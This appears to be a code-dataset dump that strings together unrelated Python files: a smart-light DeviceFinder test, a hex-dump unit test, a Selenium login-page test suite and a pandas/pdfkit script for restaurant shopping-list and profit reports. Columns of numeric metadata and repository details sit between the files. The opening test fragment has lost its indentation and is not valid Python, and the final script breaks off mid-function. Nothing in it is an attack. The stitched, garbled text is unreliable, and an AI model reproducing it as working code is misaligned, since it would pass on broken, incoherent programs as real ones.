found = []
reference = DeviceFinder.from_kwargs(label="kitchen")
async for device in reference.serials(V.sender):
found.append(device)
assert [f.serial for f in found] == [V.d3.serial]
assert found[0].info == {
"hue": V.d3.attrs.color.hue,
"label": "kitchen",
"power": "off",
"serial": V.d3.serial,
"kelvin": V.d3.attrs.color.kelvin,
"saturation": V.d3.attrs.color.saturation,
"brightness": V.d3.attrs.color.brightness,
}
for device in V.devices:
V.devices.store(device).assertIncoming(
DiscoveryMessages.GetService(), LightMessages.GetColor()
)
V.devices.store(device).clear()
found = []
reference = DeviceFinder.from_kwargs(label="kitchen")
async for device in reference.info(V.sender):
found.append(device)
assert [f.serial for f in found] == [V.d3.serial]
assert found[0].info == {
"cap": pytest.helpers.has_caps_list("color", "variable_color_temp"),
"firmware_version": "2.80",
"hue": V.d3.attrs.color.hue,
"label": "kitchen",
"power": "off",
"serial": V.d3.serial,
"kelvin": V.d3.attrs.color.kelvin,
"saturation": V.d3.attrs.color.saturation,
"brightness": V.d3.attrs.color.brightness,
"group_id": "aa000000000000000000000000000000",
"product_id": 27,
"group_name": "g1",
"location_id": "bb000000000000000000000000000000",
"location_name": "l1",
}
for device in V.devices:
if device is V.d3:
V.devices.store(device).assertIncoming(
DiscoveryMessages.GetService(),
LightMessages.GetColor(),
DeviceMessages.GetVersion(),
DeviceMessages.GetHostFirmware(),
DeviceMessages.GetGroup(),
DeviceMessages.GetLocation(),
)
else:
V.devices.store(device).assertIncoming(
DiscoveryMessages.GetService(), LightMessages.GetColor()
)
V.devices.store(device).clear()
async it "can reuse a finder", V:
finder = Finder(V.sender)
reference = DeviceFinder.empty(finder=finder)
found, ss = await reference.find(V.sender, timeout=5)
reference.raise_on_missing(found)
assert sorted(list(found)) == sorted(binascii.unhexlify(s)[:6] for s in ss)
assert ss == sorted(V.serials)
for device in V.devices:
V.devices.store(device).assertIncoming(DiscoveryMessages.GetService)
V.devices.store(device).clear()
reference = DeviceFinder.from_kwargs(label="kitchen", finder=finder)
found, ss = await reference.find(V.sender, timeout=5)
reference.raise_on_missing(found)
assert sorted(list(found)) == sorted(binascii.unhexlify(s)[:6] for s in ss)
assert ss == []
for device in V.devices:
V.devices.store(device).assertIncoming(LightMessages.GetColor())
V.devices.store(device).clear()
await V.d3.change_one("label", "kitchen", event=None)
reference = DeviceFinder.from_kwargs(label="kitchen", finder=finder)
found, ss = await reference.find(V.sender, timeout=5)
reference.raise_on_missing(found)
assert sorted(list(found)) == sorted(binascii.unhexlify(s)[:6] for s in ss)
# It can't find it because the finder has the label cached
assert ss == []
for device in V.devices:
V.devices.store(device).assertIncoming()
V.devices.store(device).clear()
await V.d3.change_one("label", "kitchen", event=None)
reference = DeviceFinder.from_kwargs(label="kitchen", refresh_info=True, finder=finder)
found, ss = await reference.find(V.sender, timeout=5)
reference.raise_on_missing(found)
assert sorted(list(found)) == sorted(binascii.unhexlify(s)[:6] for s in ss)
# But now it can because refresh_info is True
assert ss == [V.d3.serial]
for device in V.devices:
V.devices.store(device).assertIncoming(LightMessages.GetColor())
V.devices.store(device).clear()
reference = DeviceFinder.from_kwargs(cap="matrix", finder=finder)
found, ss = await reference.find(V.sender, timeout=5)
reference.raise_on_missing(found)
assert sorted(list(found)) == sorted(binascii.unhexlify(s)[:6] for s in ss)
assert ss == [V.d1.serial]
for device in V.devices:
V.devices.store(device).assertIncoming(DeviceMessages.GetVersion())
V.devices.store(device).clear()
reference = DeviceFinder.from_kwargs(cap=["matrix", "multizone"], finder=finder)
found, ss = await reference.find(V.sender, timeout=5)
reference.raise_on_missing(found)
assert sorted(list(found)) == sorted(binascii.unhexlify(s)[:6] for s in ss)
assert ss == [V.d1.serial, V.d2.serial]
for device in V.devices:
V.devices.store(device).assertIncoming()
V.devices.store(device).clear()
reference = DeviceFinder.from_kwargs(cap=["not_matrix"], label="kitchen", finder=finder)
found, ss = await reference.find(V.sender, timeout=5)
reference.raise_on_missing(found)
assert sorted(list(found)) == sorted(binascii.unhexlify(s)[:6] for s in ss)
assert ss == [V.d3.serial]
for device in V.devices:
V.devices.store(device).assertIncoming()
V.devices.store(device).clear()
found = []
reference = DeviceFinder.from_kwargs(label="kitchen", finder=finder)
async for device in reference.serials(V.sender):
found.append(device)
assert [f.serial for f in found] == [V.d3.serial]
assert found[0].info == {
"cap": pytest.helpers.has_caps_list("color", "variable_color_temp"),
"hue": V.d3.attrs.color.hue,
"label": "kitchen",
"power": "off",
"serial": V.d3.serial,
"kelvin": V.d3.attrs.color.kelvin,
"saturation": V.d3.attrs.color.saturation,
"brightness": V.d3.attrs.color.brightness,
"product_id": 27,
}
for device in V.devices:
assert V.devices.store(device) == []
found = []
reference = DeviceFinder.from_kwargs(label="kitchen", finder=finder)
async for device in reference.info(V.sender):
found.append(device)
assert [f.serial for f in found] == [V.d3.serial]
assert found[0].info == {
"cap": pytest.helpers.has_caps_list("color", "variable_color_temp"),
"firmware_version": "2.80",
"hue": V.d3.attrs.color.hue,
"label": "kitchen",
"power": "off",
"serial": V.d3.serial,
"kelvin": V.d3.attrs.color.kelvin,
"saturation": V.d3.attrs.color.saturation,
"brightness": V.d3.attrs.color.brightness,
"group_id": "aa000000000000000000000000000000",
"product_id": 27,
"group_name": "g1",
"location_id": "bb000000000000000000000000000000",
"location_name": "l1",
}
for device in V.devices:
if device is V.d3:
V.devices.store(device).assertIncoming(
DeviceMessages.GetHostFirmware(),
DeviceMessages.GetGroup(),
DeviceMessages.GetLocation(),
)
else:
V.devices.store(device).assertIncoming()
V.devices.store(device).clear()
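# Usage sketch outside the test harness (a minimal sketch; how `sender` is
# obtained is environment-specific and assumed here):
#
#     reference = DeviceFinder.from_kwargs(label="kitchen")
#     async for device in reference.info(sender):
#         print(device.serial, device.info)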
| 39.858182
| 98
| 0.548992
| 2,309
| 21,922
| 5.119965
| 0.092248
| 0.035865
| 0.038488
| 0.056251
| 0.808493
| 0.801979
| 0.789207
| 0.778548
| 0.767214
| 0.740315
| 0
| 0.020508
| 0.339385
| 21,922
| 549
| 99
| 39.930783
| 0.795816
| 0.005155
| 0
| 0.696035
| 0
| 0
| 0.093511
| 0.01064
| 0
| 0
| 0
| 0
| 0.226872
| 0
| null | null | 0.004405
| 0.017621
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a038eae8b85ba698490a532f76443cd32f20a633
| 4,201
|
py
|
Python
|
tests/test_dump_mem.py
|
dhylands/bioloid3
|
e2b8e4f044110b63decafe514b78b6f7f4d7883e
|
[
"MIT"
] | 11
|
2016-09-18T08:00:18.000Z
|
2021-04-09T10:59:00.000Z
|
tests/test_dump_mem.py
|
dhylands/bioloid3
|
e2b8e4f044110b63decafe514b78b6f7f4d7883e
|
[
"MIT"
] | null | null | null |
tests/test_dump_mem.py
|
dhylands/bioloid3
|
e2b8e4f044110b63decafe514b78b6f7f4d7883e
|
[
"MIT"
] | 5
|
2016-12-26T04:19:30.000Z
|
2022-03-02T00:41:47.000Z
|
#!/usr/bin/env python3
# This file tests the dump_mem hex-dump helper
import unittest
import binascii
from bioloid.dump_mem import dump_mem
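# dump_mem's keyword arguments, as inferred from the tests below (an
# assumption; not taken from the library's documentation):
#   dump_mem(buf, prefix='', addr=0, line_width=16,
#            show_addr=True, show_ascii=True, log=print)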
PREFIX = ' Prefix'
class TestDumpMem(unittest.TestCase):
def clear_log(self):
self.log_lines = []
def log(self, msg):
self.log_lines.append(msg)
# print(msg)
def test_empty_buffer(self):
self.clear_log()
dump_mem(b'', prefix=PREFIX, log=self.log)
self.assertEqual(self.log_lines, [
' Prefix:No data'
])
def test_less_than_one_line(self):
self.clear_log()
dump_mem(b'0123', prefix=PREFIX, log=self.log)
self.assertEqual(self.log_lines, [
' Prefix: 0000: 30 31 32 33 0123'
])
def test_less_than_one_line_no_ascii(self):
self.clear_log()
dump_mem(b'0123', prefix=PREFIX, show_ascii=False, log=self.log)
self.assertEqual(self.log_lines, [
' Prefix: 0000: 30 31 32 33'
])
def test_exactly_one_line(self):
self.clear_log()
dump_mem(b'0123456789ABCDEF', prefix=PREFIX, log=self.log)
self.assertEqual(self.log_lines, [
' Prefix: 0000: 30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46 0123456789ABCDEF'
])
def test_exactly_one_line_no_ascii(self):
self.clear_log()
dump_mem(b'0123456789ABCDEF', prefix=PREFIX, show_ascii=False, log=self.log)
self.assertEqual(self.log_lines, [
' Prefix: 0000: 30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46'
])
def test_a_bit_more_than_a_line(self):
self.clear_log()
dump_mem(b'0123456789ABCDEFG', prefix=PREFIX, log=self.log)
self.assertEqual(self.log_lines, [
' Prefix: 0000: 30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46 0123456789ABCDEF',
' Prefix: 0010: 47 G'
])
def test_a_bit_more_than_a_line_no_ascii(self):
self.clear_log()
dump_mem(b'0123456789ABCDEFG', prefix=PREFIX, show_ascii=False, log=self.log)
self.assertEqual(self.log_lines, [
' Prefix: 0000: 30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46',
' Prefix: 0010: 47'
])
def test_no_prefix(self):
self.clear_log()
dump_mem(b'0123456789ABCDEFG', log=self.log)
self.assertEqual(self.log_lines, [
'0000: 30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46 0123456789ABCDEF',
'0010: 47 G'
])
def test_no_prefix_no_addr(self):
self.clear_log()
dump_mem(b'0123456789ABCDEFG', show_addr=False, log=self.log)
self.assertEqual(self.log_lines, [
'30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46 0123456789ABCDEF',
'47 G'
])
def test_no_prefix_no_addr_no_ascii(self):
self.clear_log()
dump_mem(b'0123456789ABCDEFG', show_addr=False, show_ascii=False, log=self.log)
self.assertEqual(self.log_lines, [
'30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46',
'47'
])
def test_addr(self):
self.clear_log()
dump_mem(b'0123456789ABCDEFG', addr=0x1234, log=self.log)
self.assertEqual(self.log_lines, [
'1234: 30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46 0123456789ABCDEF',
'1244: 47 G'
])
def test_addr_line_width(self):
self.clear_log()
dump_mem(b'0123456789ABCDEFG', addr=0x1234, line_width=8, log=self.log)
self.assertEqual(self.log_lines, [
'1234: 30 31 32 33 34 35 36 37 01234567',
'123c: 38 39 41 42 43 44 45 46 89ABCDEF',
'1244: 47 G'
])
def test_non_printable(self):
self.clear_log()
dump_mem(b'012\x00\x01\x1e\x1f456', log=self.log)
self.assertEqual(self.log_lines, [
'0000: 30 31 32 00 01 1e 1f 34 35 36 012....456',
])
def test_neg_line_width(self):
self.clear_log()
dump_mem(b'0123456789ABCDEFG', prefix=PREFIX, line_width=-6, log=self.log)
self.assertEqual(self.log_lines, [
' Prefix: 0000: 30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46 0123456789ABCDEF',
' Prefix: 0010: 47 G'
])
if __name__ == '__main__':
unittest.main()
| 32.315385
| 91
| 0.612235
| 638
| 4,201
| 3.846395
| 0.15047
| 0.085575
| 0.07824
| 0.09128
| 0.834556
| 0.810106
| 0.797881
| 0.778321
| 0.719234
| 0.710269
| 0
| 0.216413
| 0.280647
| 4,201
| 129
| 92
| 32.565891
| 0.595632
| 0.015473
| 0
| 0.461538
| 0
| 0.028846
| 0.349867
| 0.005323
| 0
| 0
| 0.002903
| 0
| 0.134615
| 1
| 0.153846
| false
| 0
| 0.028846
| 0
| 0.192308
| 0.009615
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a0840103880ed9956378402aaf466bbc48187ab6
| 9,709
|
py
|
Python
|
qa327_test/frontend/test_login.py
|
15vrs/cmpe-327
|
aeb1de94604eb0d151ffdd9431b4149f2ec30f9c
|
[
"MIT"
] | null | null | null |
qa327_test/frontend/test_login.py
|
15vrs/cmpe-327
|
aeb1de94604eb0d151ffdd9431b4149f2ec30f9c
|
[
"MIT"
] | null | null | null |
qa327_test/frontend/test_login.py
|
15vrs/cmpe-327
|
aeb1de94604eb0d151ffdd9431b4149f2ec30f9c
|
[
"MIT"
] | null | null | null |
import pytest
from seleniumbase import BaseCase
from qa327_test.conftest import base_url
from unittest.mock import Mock, patch
from qa327.models import db, User
from werkzeug.security import generate_password_hash, check_password_hash
# Mock a sample user
test_user = User(
email='test_frontend@test.com',
name='test_frontend',
password=generate_password_hash('Password!'),
balance=0
)
class FrontEndLoginTest(BaseCase):
# R1.1 If the user hasn't logged in, show the login page.
# R1.2 The login page has a message that by default says 'please login'.
# R1.4 The login page provides a login form which requests two fields: email and password.
def test_login_page(self, *_):
# invalidate all sessions
self.open(base_url + '/logout')
# navigate to login page
self.open(base_url + '/login')
# verify all form elements present
self.assert_element_present("h1")
self.assert_text("Log In", "h1")
self.assert_element_present("h4#message")
self.assert_text("Please login", "h4#message")
self.assert_element_present("input#email")
self.assert_element_present("input#password")
self.assert_element_present("input#btn-submit")
# R1.3 If the user has logged in, redirect to the user profile page.
@patch('qa327.backend.get_user', return_value=test_user)
@patch('qa327.backend.login_user', return_value=test_user)
def test_login_redirect(self, *_):
# invalidate all sessions
self.open(base_url + '/logout')
# navigate to login page
self.open(base_url + '/login')
# submit correct credentials
self.type("#email", test_user.email)
self.type("#password", test_user.password)
self.click("input#btn-submit")
# navigate to login page again
self.open(base_url + '/login')
# verify redirect occurred
self.assert_element_present("h2#welcome-header")
self.assert_text("Hi", "h2#welcome-header")
# R1.5 The login form can be submitted as a POST request to the current URL.
# R1.7a Valid email can login.
# R1.10 If email/password are correct, redirect to `/`
@patch('qa327.backend.get_user', return_value=test_user)
@patch('qa327.backend.login_user', return_value=test_user)
def test_login_valid_credentials(self, *_):
# invalidate all sessions
self.open(base_url + '/logout')
# navigate to login page
self.open(base_url + '/login')
# submit correct credentials
self.type("#email", test_user.email)
self.type("#password", test_user.password)
self.click("input#btn-submit")
# verify `/` page is displayed
self.assert_element_present("h2#welcome-header")
self.assert_text("Hi", "h2#welcome-header")
# R1.6a Empty email and password does not login.
def test_login_empty_inputs(self, *_):
# invalidate all sessions
self.open(base_url + '/logout')
# navigate to login page
self.open(base_url + '/login')
# submit empty form
self.click("input#btn-submit")
# verify all form elements present
self.assert_element_present("h1")
self.assert_text("Log In", "h1")
self.assert_element_present("h4#message")
self.assert_text("Please login", "h4#message")
self.assert_element_present("input#email")
self.assert_element_present("input#password")
self.assert_element_present("input#btn-submit")
# R1.6b Empty email does not login.
def test_login_empty_password(self, *_):
# invalidate all sessions
self.open(base_url + '/logout')
# navigate to login page
self.open(base_url + '/login')
# submit incomplete form
self.type("#password", test_user.password)
self.click("input#btn-submit")
# verify all form elements present
self.assert_element_present("h1")
self.assert_text("Log In", "h1")
self.assert_element_present("h4#message")
self.assert_text("Please login", "h4#message")
self.assert_element_present("input#email")
self.assert_element_present("input#password")
self.assert_element_present("input#btn-submit")
# R1.6c Empty password does not login.
def test_login_empty_email(self, *_):
# invalidate all sessions
self.open(base_url + '/logout')
# navigate to login page
self.open(base_url + '/login')
# submit incomplete form
self.type("#email", test_user.email)
self.click("input#btn-submit")
# verify all form elements present
self.assert_element_present("h1")
self.assert_text("Log In", "h1")
self.assert_element_present("h4#message")
self.assert_text("Please login", "h4#message")
self.assert_element_present("input#email")
self.assert_element_present("input#password")
self.assert_element_present("input#btn-submit")
# R1.7b Invalid email cannot login and error message 'email/password format is incorrect' is displayed.
def test_login_invalid_email_format(self, *_):
# invalidate all sessions
self.open(base_url + '/logout')
# navigate to login page
self.open(base_url + '/login')
# submit credentials with an invalid email format
self.type("#email", "test_frontend")
self.type("#password", test_user.password)
self.click("input#btn-submit")
# verify error message
self.assert_element_present("h4#message")
self.assert_text("email/password format is incorrect", "h4#message")
# R1.8a User with password shorter than 6 characters cannot log in
# and error message 'email/password format is incorrect' is displayed.
def test_login_invalid_password_less_than_6_characters(self, *_):
# invalidate all sessions
self.open(base_url + '/logout')
# navigate to login page
self.open(base_url + '/login')
# submit credentials with a password shorter than 6 characters
self.type("#email", test_user.email)
self.type("#password", "Pass!")
self.click("input#btn-submit")
# verify error message
self.assert_element_present("h4#message")
self.assert_text("email/password format is incorrect", "h4#message")
# R1.8b User with password with no uppercase characters cannot log in
# and error message 'email/password format is incorrect' is displayed.
def test_login_invalid_password_no_uppercase(self, *_):
# invalidate all sessions
self.open(base_url + '/logout')
# navigate to login page
self.open(base_url + '/login')
# submit credentials with a password lacking uppercase characters
self.type("#email", test_user.email)
self.type("#password", "password!")
self.click("input#btn-submit")
# verify error message
self.assert_element_present("h4#message")
self.assert_text("email/password format is incorrect", "h4#message")
# R1.8c User with password with no lowercase characters cannot log in
# and error message 'email/password format is incorrect' is displayed.
def test_login_invalid_password_no_lowercase(self, *_):
# invalidate all sessions
self.open(base_url + '/logout')
# navigate to login page
self.open(base_url + '/login')
# submit credentials with a password lacking lowercase characters
self.type("#email", test_user.email)
self.type("#password", "PASSWORD!")
self.click("input#btn-submit")
# verify error message
self.assert_element_present("h4#message")
self.assert_text("email/password format is incorrect", "h4#message")
# R1.8d User with password with no special characters cannot log in
# and error message 'email/password format is incorrect' is displayed.
def test_login_invalid_password_no_special(self, *_):
# invalidate all sessions
self.open(base_url + '/logout')
# navigate to login page
self.open(base_url + '/login')
# submit credentials with a password lacking special characters
self.type("#email", test_user.email)
self.type("#password", "Password")
self.click("input#btn-submit")
# verify error message
self.assert_element_present("h4#message")
self.assert_text("email/password format is incorrect", "h4#message")
# R1.11a Invalid email redirects to `/login` with error message.
@patch('qa327.backend.login_user', return_value=None)
def test_login_invalid_email_credential(self, *_):
# invalidate all sessions
self.open(base_url + '/logout')
# navigate to login page
self.open(base_url + '/login')
# submit credentials for an unregistered email
self.type("#email", "testing@test.com")
self.type("#password", test_user.password)
self.click("input#btn-submit")
# verify error message
self.assert_element_present("h4#message")
self.assert_text("email/password combination incorrect", "h4#message")
# R1.11b Invalid password redirects to `/login` with error message.
@patch('qa327.backend.login_user', return_value=None)
def test_login_invalid_password_credential(self, *_):
# invalidate all sessions
self.open(base_url + '/logout')
# navigate to login page
self.open(base_url + '/login')
# submit an incorrect password
self.type("#email", test_user.email)
self.type("#password", "WrongPassword!")
self.click("input#btn-submit")
# verify error message
self.assert_element_present("h4#message")
self.assert_text("email/password combination incorrect", "h4#message")
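# The four R1.8 password-format cases above share one body; a hedged sketch of
# a table-driven variant (the 'parameterized' package is an assumption, not
# part of this suite):
#
#   from parameterized import parameterized
#
#   @parameterized.expand([("Pass!",), ("password!",), ("PASSWORD!",), ("Password",)])
#   def test_login_invalid_password_format(self, bad_password, *_):
#       self.open(base_url + '/logout')
#       self.open(base_url + '/login')
#       self.type("#email", test_user.email)
#       self.type("#password", bad_password)
#       self.click("input#btn-submit")
#       self.assert_text("email/password format is incorrect", "h4#message")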
avg_line_length: 42.770925 | max_line_length: 107 | alphanum_fraction: 0.660212 | qsc_code_num_words: 1,230 | qsc_code_num_chars: 9,709 | … remaining qsc_* quality-signal values
hexsha: a0a0102ca38f5dda97f57ee7b625218b5ad38128 | size: 12,331 | ext: py | lang: Python
path: scripts/calculadoraAlimentos/pdf.py | repo: Salvaaragon/LasGemelas @ 88deac2b6a464f84a7cebc208b5583e1d2eddb19 | licenses: ["MIT"] | stars/issues/forks counts: null
import pandas as pd
import numpy as np
import pandas
import os
# Compute the column totals
# https://stackoverflow.com/questions/41286569/get-total-of-pandas-column
from jinja2 import Environment, FileSystemLoader # Templating
#from weasyprint import HTML # Generating PDF
#from headless_pdfkit import generate_pdf
import pdfkit
# Global constants
EXCEL_OUTPUT = "output.xlsx"
EXCEL_EVENTO = "evento.xlsx"
EXCEL_MENU = "menu.xlsx"
EXCEL_RECETA = "receta.xlsx"
SHEET_PRINCIPAL = 0
SHEET_PRODUCTOS = 1
SHEET_BEBIDAS = 2
SHEET_MATERIALES = 3
SHEET_TRABAJADORES = 4
# API:
# def printPDF (html_out:str)
# def printListaCompraReceta ()
# def printListaCompraMenu ()
# def printListaCompraEvento ()
# def printBeneficioReceta ()
# def printBeneficioMenu ()
# def printBeneficioEvento ()
def printPDF (html_out: str, file_name: str):
html_out = str(html_out)
file_name = str(file_name)
# Generate PDF (pdfkit)
this_dir, this_filename = os.path.split(__file__)
pdfkit.from_string(html_out, file_name, css=[this_dir+'/templates/typography.css'])
# Generate PDF (headless pdfkit)
# pdf_out = generate_pdf(html_out)
# with open('evento.pdf', 'wb') as w:
# w.write(pdf_out)
# w.close()
# Generate PDF Weasyprint
#HTML(string=html_out).write_pdf("evento.pdf", stylesheets=["typography.css"])
def printListaCompraReceta ():
# Get the recipe name (title of the first sheet)
str_tituloReceta = pd.ExcelFile(EXCEL_RECETA).sheet_names[0]
# Read Excel sheet to DataFrame
df_principal = pandas.read_excel(io=EXCEL_RECETA, sheet_name=SHEET_PRINCIPAL)
df_productos = pandas.read_excel(io=EXCEL_RECETA, sheet_name=SHEET_PRODUCTOS)
# Drop pricing/profit columns from Productos
del df_productos['PrecioCompra/Unidad']
del df_productos['PrecioVenta/Unidad']
del df_productos['Coste']
del df_productos['BeneficioBruto']
del df_productos['BeneficioNeto']
# Write dataframe to excel file
writer = pd.ExcelWriter('output.xlsx')
df_principal.to_excel (excel_writer=writer, sheet_name=str_tituloReceta)
df_productos.to_excel (excel_writer=writer, sheet_name='Productos')
writer.save()
# Templating
this_dir, this_filename = os.path.split(__file__)
env = Environment(loader=FileSystemLoader(searchpath=this_dir+'/templates/'))
template = env.get_template('template_receta.html')
template_vars = {
"Receta": str_tituloReceta,
"Titulo": "Lista compra de la Receta: " + str_tituloReceta,
"Productos": df_productos.to_html (na_rep="", justify='center')
}
html_out = template.render(template_vars)
# Print PDF
printPDF(html_out, 'receta.pdf')
def printListaCompraMenu ():
# Get the menu name (title of the first sheet)
str_tituloMenu = pd.ExcelFile(EXCEL_MENU).sheet_names[0]
# Read Excel sheet to DataFrame
df_principal = pandas.read_excel(io=EXCEL_MENU, sheet_name=SHEET_PRINCIPAL)
df_productos = pandas.read_excel(io=EXCEL_MENU, sheet_name=SHEET_PRODUCTOS)
df_bebidas = pandas.read_excel(io=EXCEL_MENU, sheet_name=SHEET_BEBIDAS)
# Drop pricing/profit columns from Productos
del df_productos['PrecioCompra/Unidad']
del df_productos['PrecioVenta/Unidad']
del df_productos['Coste']
del df_productos['BeneficioBruto']
del df_productos['BeneficioNeto']
# Drop pricing/profit columns from Bebidas
del df_bebidas['PrecioCompra/Unidad']
del df_bebidas['PrecioVenta/Unidad']
del df_bebidas['Coste']
del df_bebidas['BeneficioBruto']
del df_bebidas['BeneficioNeto']
# Write dataframe to excel file
writer = pd.ExcelWriter('output.xlsx')
df_principal.to_excel (excel_writer=writer, sheet_name=str_tituloMenu)
df_productos.to_excel (excel_writer=writer, sheet_name='Productos')
df_bebidas.to_excel (excel_writer=writer, sheet_name='Bebidas')
writer.save()
# Templating
this_dir, this_filename = os.path.split(__file__)
env = Environment(loader=FileSystemLoader(searchpath=this_dir+'/templates/'))
template = env.get_template('template_menu.html')
template_vars = {
"Menu": str_tituloMenu,
"Titulo": "Lista compra del Menú: " + str_tituloMenu,
"Productos": df_productos.to_html (na_rep="", justify='center'),
"Bebidas": df_bebidas.to_html (na_rep="", justify='center')
}
html_out = template.render(template_vars)
# Print PDF
printPDF(html_out, 'menu.pdf')
def printListaCompraEvento ():
# Get the event name (title of the first sheet)
str_tituloEvento = pd.ExcelFile(EXCEL_EVENTO).sheet_names[0]
# Read Excel sheet to DataFrame
df_principal = pandas.read_excel(io=EXCEL_EVENTO, sheet_name=SHEET_PRINCIPAL)
df_productos = pandas.read_excel(io=EXCEL_EVENTO, sheet_name=SHEET_PRODUCTOS)
df_bebidas = pandas.read_excel(io=EXCEL_EVENTO, sheet_name=SHEET_BEBIDAS)
df_materiales = pandas.read_excel(io=EXCEL_EVENTO, sheet_name=SHEET_MATERIALES)
# Drop pricing/profit columns from Productos
del df_productos['PrecioCompra/Unidad']
del df_productos['PrecioVenta/Unidad']
del df_productos['Coste']
del df_productos['BeneficioBruto']
del df_productos['BeneficioNeto']
# Drop pricing/profit columns from Bebidas
del df_bebidas['PrecioCompra/Unidad']
del df_bebidas['PrecioVenta/Unidad']
del df_bebidas['Coste']
del df_bebidas['BeneficioBruto']
del df_bebidas['BeneficioNeto']
# Drop pricing/profit columns from Materiales
del df_materiales['PrecioCompra/Unidad']
del df_materiales['PrecioVenta/Unidad']
del df_materiales['Coste']
del df_materiales['BeneficioBruto']
del df_materiales['BeneficioNeto']
# Write dataframe to excel file
writer = pd.ExcelWriter('output.xlsx')
df_principal.to_excel (excel_writer=writer, sheet_name=str_tituloEvento)
df_productos.to_excel (excel_writer=writer, sheet_name='Productos')
df_bebidas.to_excel (excel_writer=writer, sheet_name='Bebidas')
df_materiales.to_excel (excel_writer=writer, sheet_name='Materiales')
writer.save()
# Templating
this_dir, this_filename = os.path.split(__file__)
env = Environment(loader=FileSystemLoader(searchpath=this_dir+'/templates/'))
template = env.get_template('template_evento.html')
template_vars = {
"Evento": str_tituloEvento,
"Titulo": "Lista compra del Evento: " + str_tituloEvento,
"Productos": df_productos.to_html (na_rep="", justify='center'),
"Bebidas": df_bebidas.to_html (na_rep="", justify='center'),
"Materiales": df_materiales.to_html (na_rep="", justify='center')
}
html_out = template.render(template_vars)
# Print PDF
printPDF(html_out, 'evento.pdf')
def printBeneficioReceta ():
# Get the recipe name (title of the first sheet)
str_tituloReceta = pd.ExcelFile(EXCEL_RECETA).sheet_names[0]
# Read Excel sheet to DataFrame
df_principal = pandas.read_excel(io=EXCEL_RECETA, sheet_name=SHEET_PRINCIPAL)
df_productos = pandas.read_excel(io=EXCEL_RECETA, sheet_name=SHEET_PRODUCTOS)
# Compute totals for Productos
df_productos.at['Total Coste', 'Coste'] = str(df_productos['Coste'].sum())
df_productos.at['Total Beneficio Bruto', 'BeneficioBruto'] = str(df_productos['BeneficioBruto'].sum())
df_productos.at['Total Beneficio Neto', 'BeneficioNeto'] = str(df_productos['BeneficioNeto'].sum())
# Write dataframe to excel file
writer = pd.ExcelWriter('output.xlsx')
df_principal.to_excel (excel_writer=writer, sheet_name=str_tituloReceta)
df_productos.to_excel (excel_writer=writer, sheet_name='Productos')
writer.save()
# Templating
this_dir, this_filename = os.path.split(__file__)
env = Environment(loader=FileSystemLoader(searchpath=this_dir+'/templates/'))
template = env.get_template('template_receta.html')
template_vars = {
"Receta": str_tituloReceta,
"Titulo": "Beneficio de la Reeta: " + str_tituloReceta,
"Productos": df_productos.to_html(na_rep="", justify='center'),
}
html_out = template.render(template_vars)
# Print PDF
printPDF(html_out, 'receta.pdf')
def printBeneficioMenu ():
# Get the menu name (title of the first sheet)
str_tituloMenu = pd.ExcelFile(EXCEL_MENU).sheet_names[0]
# Read Excel sheet to DataFrame
df_principal = pandas.read_excel(io=EXCEL_MENU, sheet_name=SHEET_PRINCIPAL)
df_productos = pandas.read_excel(io=EXCEL_MENU, sheet_name=SHEET_PRODUCTOS)
df_bebidas = pandas.read_excel(io=EXCEL_MENU, sheet_name=SHEET_BEBIDAS)
# Compute totals for Productos
df_productos.at['Total Coste', 'Coste'] = str(df_productos['Coste'].sum())
df_productos.at['Total Beneficio Bruto', 'BeneficioBruto'] = str(df_productos['BeneficioBruto'].sum())
df_productos.at['Total Beneficio Neto', 'BeneficioNeto'] = str(df_productos['BeneficioNeto'].sum())
# Compute totals for Bebidas
df_bebidas.at['Total Coste', 'Coste'] = str(df_bebidas['Coste'].sum())
df_bebidas.at['Total Beneficio Bruto', 'BeneficioBruto'] = str(df_bebidas['BeneficioBruto'].sum())
df_bebidas.at['Total Beneficio Neto', 'BeneficioNeto'] = str(df_bebidas['BeneficioNeto'].sum())
# Write dataframe to excel file
writer = pd.ExcelWriter('output.xlsx')
df_principal.to_excel (excel_writer=writer, sheet_name=str_tituloMenu)
df_productos.to_excel (excel_writer=writer, sheet_name='Productos')
df_bebidas.to_excel (excel_writer=writer, sheet_name='Bebidas')
writer.save()
# Templating
this_dir, this_filename = os.path.split(__file__)
env = Environment(loader=FileSystemLoader(searchpath=this_dir+'/templates/'))
template = env.get_template('template_menu.html')
template_vars = {
"Menu": str_tituloMenu,
"Titulo": "Beneficio del Menú: " + str_tituloMenu,
"Productos": df_productos.to_html(na_rep="", justify='center'),
"Bebidas": df_bebidas.to_html (na_rep="", justify='center'),
}
html_out = template.render(template_vars)
# Print PDF
printPDF(html_out, 'menu.pdf')
def printBeneficioEvento ():
# Get the event name (title of the first sheet)
str_tituloEvento = pd.ExcelFile(EXCEL_EVENTO).sheet_names[0]
# Read Excel sheet to DataFrame
df_principal = pandas.read_excel(io=EXCEL_EVENTO, sheet_name=SHEET_PRINCIPAL)
df_productos = pandas.read_excel(io=EXCEL_EVENTO, sheet_name=SHEET_PRODUCTOS)
df_bebidas = pandas.read_excel(io=EXCEL_EVENTO, sheet_name=SHEET_BEBIDAS)
df_materiales = pandas.read_excel(io=EXCEL_EVENTO, sheet_name=SHEET_MATERIALES)
df_trabajadores = pandas.read_excel(io=EXCEL_EVENTO, sheet_name=SHEET_TRABAJADORES)
# Compute totals for Productos
df_productos.at['Total Coste', 'Coste'] = str(df_productos['Coste'].sum())
